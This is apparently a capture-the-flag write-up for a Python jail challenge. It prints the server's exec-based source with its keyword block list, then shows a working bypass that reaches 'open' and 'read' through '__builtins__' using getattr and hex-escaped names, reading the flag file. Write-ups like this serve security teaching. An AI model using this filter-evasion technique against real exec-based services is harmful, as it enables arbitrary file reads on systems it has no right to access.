Tags: exploitation pyjail python3 

Rating: 5.0

To start the challenge you have to connect:
```
nc prob.vulnerable.kr 20001
```

Since you connect, it prints the source of the program running:
```
Hi! Welcome to pyjail!
========================================================================
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to pyjail!")
print("========================================================================")
print(open(__file__).read())
print("========================================================================")
print("RUN")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("No!!!")
return;
else:
exec(text)
if __name__ == "__main__":
main()
========================================================================
RUN
>>>
```

Note that your string cannot contain any of the keywords `['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']`, so I first tried changing `__file__` to `/home/python_jail/flag` with the following:
```
getattr(main, '__globals__')['__file__'] = '/home/python_jail/flag' ; main()
Hi! Welcome to pyjail!
========================================================================
Traceback (most recent call last):
File "/home/python_jail/python_jail.py", line 17, in <module>
main()
File "/home/python_jail/python_jail.py", line 15, in main
exec(text)
File "<string>", line 1, in <module>
File "/home/python_jail/python_jail.py", line 6, in main
print(open(__file__).read())
File "/usr/lib/python3.5/encodings/ascii.py", line 26, in decode
return codecs.ascii_decode(input, self.errors)[0]
UnicodeDecodeError: 'ascii' codec can't decode byte 0xef in position 0: ordinal not in range(128)

```

Ok, we can't just change `__file__`, so let's run open[`"\x6f\x70\x65\x6e"`] from the `__builtins__` attribute and read[`"\x72\x65\x61\x64"`] the file:
```
>>> print(getattr(getattr(getattr(main, '__globals__')['__builtins__'], '\x6f\x70\x65\x6e')('/home/python_jail/flag', 'rb'), '\x72\x65\x61\x64')())
b'\xef\xbb\xbfKorNewbie{[email protected]_y0u_d0lng?}'
```